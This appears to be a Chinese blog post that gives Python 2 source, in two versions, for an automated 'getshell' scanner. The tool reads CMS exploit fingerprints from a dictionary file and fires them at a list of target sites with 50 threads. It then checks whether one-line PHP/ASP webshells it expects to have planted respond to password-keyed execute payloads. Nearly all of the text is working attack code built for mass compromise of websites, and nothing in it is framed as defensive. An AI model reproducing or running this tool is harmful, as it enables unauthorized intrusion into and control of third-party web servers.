目標:根據上一篇寫的指紋錄入工具,可以收集很多cms等漏洞指紋,然後運行改腳本直接獲取shell,也可以作爲路徑掃描程序,同時含有一句話連接驗證功能
#coding=utf-8
import requests
import Queue
import threading
import re
queue=Queue.Queue()
#===================================================#
#exp_info
#exp_info(0) 提交的方式
#exp_info(1) 測試路徑
#exp_info(3) POST 提交的數據 GET 爲空
#exp_info(4) 關鍵字
#exp_info(5) shell的路徑
#exp_info(5) shell的密碼
#====================================================#
def init():
f=open("exp.dic")
for line in f.readlines():
exp_info=line.strip().split('|')
queue.put(exp_info)
f.close()
def openUrl(url,GET_POST,pdata):
try:
if GET_POST=="POST":
#分解post數據
s = ",".join(pdata.split("&"))
pdata = dict((l.split('=') for l in s.split(',')))
r = requests.post(url, timeout=20, allow_redirects=False, data=pdata)
else :
r = requests.get(url, timeout=20, allow_redirects=False)
content=r.content
r.close()
if r.status_code in [200,500]:
return (r.status_code ,r.encoding,content)
return (0,0,False)
except:
return (0,0,False)
def checkKeyWord(page,page_encoding,keyword):
try:
page = unicode(page, page_encoding)
except:
return False
pattern =re.compile(keyword)
if pattern.findall(page)!=[]:
return True
else:
return False
def checkConnectionSuccess(shell_url,pdata):
status_code, encoding, content = openUrl(shell_url, "POST", pdata)
#print status_code,content
if content == "test":
print " the connection is successful "
else:
print "the connection is fail"
def checkGetShellSuccess(shell_url,shell_pwd):
script_type=shell_url.split(".")[-1]
#print script_type
if script_type=='php':
pdata=shell_pwd+'=echo "test";'
return checkConnectionSuccess(shell_url,pdata)
elif script_type=='asp':
pdata=shell_pwd+'=execute("response.clear:response.write(""test""):response.end")'
return checkConnectionSuccess(shell_url,pdata)
else:
pdata=shell_pwd+'=Response.Clear();Response.Write("test");'
return checkConnectionSuccess(shell_url,pdata)
def output(content,status_code,page_encoding,test_url,re_keyword,shell_url,shell_pwd):
if content is not False:
if content is None:
print '[-]status[%s]---%s |no foud data' % (status_code, test_url)
else:
if re_keyword is None:
if shell_url is None:
print '[+]status[%s]---shell url: %s | password: %s' % (status_code, test_url)
else:
print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd)
else:
if checkKeyWord(content, page_encoding, re_keyword) is True:
if shell_url is None:
print '[+]status[%s]---shell url: %s | password: %s' % (status_code, test_url)
else:
print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd)
#檢測是不是可以連接一句話
checkGetShellSuccess(shell_url, shell_pwd)
else:
print '[-]status[%s]---%s is possible' % (status_code, test_url)
def scan(url):
while not queue.empty():
exp_info=queue.get(True)
GET_POST=exp_info[0]
test_url=url+exp_info[1]
pdata=exp_info[2]
re_keyword=exp_info[3]
shell_url=url+exp_info[4]
shell_pwd=exp_info[5]
#print "scanning "+url
status_code,page_encoding,content=openUrl(test_url,GET_POST,pdata)
output(content, status_code, page_encoding, test_url, re_keyword, shell_url, shell_pwd)
queue.task_done()
if __name__=="__main__":
threadNum = 50 #線程數量
f=open("2.txt") #2.txt添加你要測試的網站
for url in f.readlines():
init()
url="http://"+url.strip()
print "scanning "+url
for i in range(threadNum):
t = threading.Thread(target=scan,args={url,})
t.start()
queue.join()
f.close()
raw_input('press enter key to exit') #這兒放一個等待輸入是爲了不讓程序退出
利用pyinstaller 打包成exe,運行結果如下:
最新加入了一句話驗證功能
優化版本
a)添加配置文件
b)文件不存在捕獲提示
c)輸出提示更完善
getshell.py
#coding=utf-8
import requests
import Queue
import threading
import re
import ConfigParser
queue=Queue.Queue()
#===================================================#
#exp_info
#exp_info(0) 提交的方式
#exp_info(1) 測試路徑
#exp_info(3) POST 提交的數據 GET 爲空
#exp_info(4) 關鍵字
#exp_info(5) shell的路徑
#exp_info(5) shell的密碼
#====================================================#
def init(filename):
try:
f=open(filename)
for line in f.readlines():
exp_info = line.strip().split('|')
queue.put(exp_info)
f.close()
except:
return False
def openUrl(url,GET_POST,pdata):
try:
if GET_POST=="POST":
#分解post數據
s = ",".join(pdata.split("&"))
pdata = dict((l.split('=') for l in s.split(',')))
r = requests.post(url, timeout=20, allow_redirects=False, data=pdata)
else :
r = requests.get(url, timeout=20, allow_redirects=False)
content=r.content
r.close()
if r.status_code in [200,500]:
return (r.status_code ,r.encoding,content)
return (0,0,False)
except:
return (0,0,False)
def checkKeyWord(page,page_encoding,keyword):
try:
page = unicode(page, page_encoding)
except:
return False
pattern =re.compile(keyword)
if pattern.findall(page)!=[]:
return True
else:
return False
def checkConnectionSuccess(shell_url,pdata):
status_code, encoding, content = openUrl(shell_url, "POST", pdata)
#print status_code,content
if content == "test":
print " the connection is successful "
else:
print "the connection is fail"
def checkGetShellSuccess(shell_url,shell_pwd):
script_type=shell_url.split(".")[-1]
#print script_type
if script_type=='php':
pdata=shell_pwd+'=echo "test";'
checkConnectionSuccess(shell_url,pdata)
else:
pdata=shell_pwd+'=execute("response.clear:response.write(""test""):response.end")'
checkConnectionSuccess(shell_url,pdata)
def output(url,content,status_code,page_encoding,test_url,re_keyword,shell_url,shell_pwd):
if content is not False:
if content is None:
print '[-]status[%s]---%s |no foud data' % (status_code, test_url)
else:
if re_keyword is None:
if shell_url ==url:
print '[+]status[%s]---shell url: %s ' % (status_code, test_url)
else:
print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd)
else:
if checkKeyWord(content, page_encoding, re_keyword) is True:
if shell_url ==url:
print '[+]status[%s]---shell url: %s ' % (status_code, test_url)
else:
print test_url
print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd)
#檢測是不是可以連接一句話
checkGetShellSuccess(shell_url, shell_pwd)
else:
print '[-]status[%s]---%s is possible' % (status_code, test_url)
def scan(url):
while not queue.empty():
exp_info=queue.get(True)
GET_POST=exp_info[0]
test_url=url+exp_info[1]
pdata=exp_info[2]
re_keyword=exp_info[3]
shell_url=url+exp_info[4]
shell_pwd=exp_info[5]
#print "scanning "+url
status_code,page_encoding,content=openUrl(test_url,GET_POST,pdata)
output(url,content, status_code, page_encoding, test_url, re_keyword, shell_url, shell_pwd)
queue.task_done()
def configRead():
config = ConfigParser.ConfigParser()
config.readfp(open('config.ini'))
test_url_file_path = config.get("file_path", "test_url_file_path")
exp_file_path = config.get("file_path", "exp_file_path")
return test_url_file_path,exp_file_path
if __name__=="__main__":
test_url_file_path, exp_file_path = configRead()
threadNum = 50
try:
f=open(test_url_file_path)
for url in f.readlines():
if(init(exp_file_path) is False):
print "exp file not found"
break
url="http://"+url.strip()
print "scanning "+url
for i in range(threadNum):
t = threading.Thread(target=scan,args={url,})
t.start()
queue.join()
f.close()
except:
print "test web url file not found"
raw_input('press enter key to exit') #這兒放一個等待輸入是爲了不讓程序退出
配置文件
config.ini
[file_path]
;網站測試文件路徑
test_url_file_path=2.txt
;exp文件路徑
exp_file_path=exp.dic